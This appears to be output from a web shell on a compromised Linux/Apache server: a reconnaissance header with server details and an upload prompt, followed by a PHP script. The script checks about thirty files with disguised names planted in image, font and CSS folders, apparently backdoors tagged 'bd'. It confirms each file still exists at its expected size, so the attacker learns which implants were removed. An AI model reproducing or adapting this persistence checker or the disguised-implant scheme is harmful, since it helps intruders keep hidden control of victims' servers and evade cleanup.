| Server IP : 46.62.235.243 / Your IP : 216.73.216.217 Web Server : Apache/2.4.58 (Ubuntu) System : Linux Linkabili3Dicembre 6.8.0-100-generic #100-Ubuntu SMP PREEMPT_DYNAMIC Tue Jan 13 16:40:06 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /dev/shm/ |
Upload File : |
<?php $r = '/var/www/linkabili/public'; $x = ["/theme/assets/img/contact/user_edit.php"=>"bd@@276373774@@997",
"/assets/backend/js/editemails_bck.php"=>"bd@@276385295@@914",
"/theme/assets/img/Main.dwt.php"=>"bd@@276349208@@1023",
"/assets/db_common.inc.php"=>"bd@@276361500@@826",
"/theme/assets/img/home-one/doctor/server.links.inc.php"=>"bd@@276373538@@925",
"/js/chatify/abt_course_nrm.php"=>"bd@@276385585@@922",
"/theme/assets/js/enrol_authorize.php"=>"bd@@276349490@@918",
"/theme/assets/img/home-one/home-slider/tot_report01.php"=>"bd@@276385092@@991",
"/assets/frontend/js/ImageManager.php"=>"bd@@276385359@@957",
"/assets/backend/forum.inc.php"=>"bd@@276350031@@1015",
"/theme/assets/img/blog/main.inc.php"=>"bd@@276360783@@936",
"/theme/assets/img/doctor-detail/noncomp.php"=>"bd@@276361045@@948",
"/css/page_guardian.php"=>"bd@@276385631@@1014",
"/fonts/vendor/slick-carousel/slick/view.message.php"=>"bd@@276373606@@886",
"/assets/frontend/css/edit_links.php"=>"bd@@276373881@@869",
"/theme/assets/img/home-three/class.zipfile.php"=>"bd@@276385148@@913",
"/theme/assets/img/home-two/template_blog.php"=>"bd@@276334467@@1038",
"/theme/assets/fonts/class.php"=>"bd@@276349319@@933",
"/css/chatify/webdb_view_test2.php"=>"bd@@276385420@@986",
"/js/pcltar.php"=>"bd@@276349068@@938",
"/ConfigDef.php"=>"bd@@276361121@@878",
"/fonts/mod_latestnews.php"=>"bd@@276361641@@936",
"/upload/certification/image.page.php"=>"bd@@276385465@@935",
"/theme/assets/css/Tag.php"=>"bd@@276373949@@949",
"/assets/backend/css/automail.php"=>"bd@@276385221@@870",
"/theme/assets/img/home-two/slider/mod_acymailing.php"=>"bd@@276373449@@812",
"/theme/assets/img/appointment/facultyInfoEN.php"=>"bd@@276373705@@955",
"/theme/assets/img/doctor/Font.php"=>"bd@@276360925@@958",
"/assets/frontend/editor.php"=>"bd@@276385526@@892",
"/theme/assets/img/home-one/libmail.php"=>"bd@@276334842@@1002"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');